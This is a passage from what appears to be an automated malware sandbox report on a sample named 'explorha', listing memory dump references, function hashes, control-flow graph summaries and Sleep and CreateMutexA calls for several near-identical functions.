                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 42c4921fa42a92c1ec1dde9402f32f14f39d12423e1a34f58885764d0ce026fd
                                                                                                                                                                                                                                        • Instruction ID: 474bc2c9bb25c279a62c2e29147eae22a14b6b0203e428ee4e05b6689c9ba294
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42c4921fa42a92c1ec1dde9402f32f14f39d12423e1a34f58885764d0ce026fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A731F471700244DBFB08DB7CDC8979DBBA2EB86314F208718E515D72D2E7BD99808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 124 709ee8-709f08 128 709f36-709f52 124->128 129 709f0a-709f16 124->129 132 709f80-709f9f 128->132 133 709f54-709f60 128->133 130 709f18-709f26 129->130 131 709f2c-709f33 call 71ecf8 129->131 130->131 134 70a40f 130->134 131->128 138 709fa1-709fad 132->138 139 709fcd-70a3e6 call 719750 132->139 136 709f62-709f70 133->136 137 709f76-709f7d call 71ecf8 133->137 141 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 134->141 142 70a40f call 7382fa 134->142 136->134 136->137 137->132 145 709fc3-709fca call 71ecf8 138->145 146 709faf-709fbd 138->146 142->141 145->139 146->134 146->145
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 4b827fd263a9c1048e128741875ba517495c743c4e410901fb58f3c044464706
                                                                                                                                                                                                                                        • Instruction ID: 1602f47a888efee1bbcb85b197ec5f01f780973cd69532e83fcb6e33b7f71399
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b827fd263a9c1048e128741875ba517495c743c4e410901fb58f3c044464706
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3314671600244DBEB08DB7CCD8979DB6A2AB86314F208718F511D72D7EBBD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 161 70a01d-70a03d 165 70a06b-70a087 161->165 166 70a03f-70a04b 161->166 167 70a0b5-70a0d4 165->167 168 70a089-70a095 165->168 169 70a061-70a068 call 71ecf8 166->169 170 70a04d-70a05b 166->170 174 70a102-70a3e6 call 719750 167->174 175 70a0d6-70a0e2 167->175 172 70a097-70a0a5 168->172 173 70a0ab-70a0b2 call 71ecf8 168->173 169->165 170->169 176 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 170->176 172->173 172->176 173->167 180 70a0e4-70a0f2 175->180 181 70a0f8-70a0ff call 71ecf8 175->181 180->176 180->181 181->174
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: eb352f738865f505f5b15370f9ca4aa653b24b5364bd0f0589c7c0912b1f5da2
                                                                                                                                                                                                                                        • Instruction ID: d47dbbc1131c2b6ac8416fdb32adb72026bcd46cf78744310484d02543f3e230
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb352f738865f505f5b15370f9ca4aa653b24b5364bd0f0589c7c0912b1f5da2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7031E671600348EBEB08DB6CCD8979DB6A2AB86314F208718E415D73D7EBBD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 196 70a152-70a172 200 70a1a0-70a1bc 196->200 201 70a174-70a180 196->201 202 70a1ea-70a209 200->202 203 70a1be-70a1ca 200->203 204 70a182-70a190 201->204 205 70a196-70a19d call 71ecf8 201->205 208 70a237-70a3e6 call 719750 202->208 209 70a20b-70a217 202->209 206 70a1e0-70a1e7 call 71ecf8 203->206 207 70a1cc-70a1da 203->207 204->205 210 70a419-70a466 call 7382fa * 2 Sleep CreateMutexA 204->210 205->200 206->202 207->206 207->210 214 70a219-70a227 209->214 215 70a22d-70a234 call 71ecf8 209->215 214->210 214->215 215->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
